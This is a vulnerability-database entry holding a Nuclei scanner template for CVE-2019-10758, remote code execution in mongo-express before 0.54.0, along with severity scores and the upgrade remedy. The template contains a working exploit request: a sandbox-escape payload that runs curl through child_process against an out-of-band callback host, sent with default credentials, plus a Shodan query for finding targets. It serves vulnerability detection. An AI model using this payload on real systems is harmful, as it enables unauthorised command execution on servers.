Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-10758
HistoryFeb 10, 2022 - 9:31 p.m.

mongo-express Remote Code Execution

2022-02-1021:31:25
ProjectDiscovery
github.com
46

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the toBSON method and misuse the vm dependency to perform exec commands in a non-safe environment.

id: CVE-2019-10758

info:
  name: mongo-express Remote Code Execution
  author: princechaddha
  severity: critical
  description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Upgrade mongo-express to version 0.54.0 or higher.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10758
    - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215
    - https://github.com/CLincat/vulcat
    - https://github.com/MelanyRoob/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2019-10758
    epss-score: 0.97429
    epss-percentile: 0.99934
    cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: mongo-express_project
    product: mongo-express
    framework: node.js
    shodan-query: http.title:"Mongo Express"
  tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js

http:
  - raw:
      - |
        POST /checkValid HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic YWRtaW46cGFzcw==
        Content-Type: application/x-www-form-urlencoded

        document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%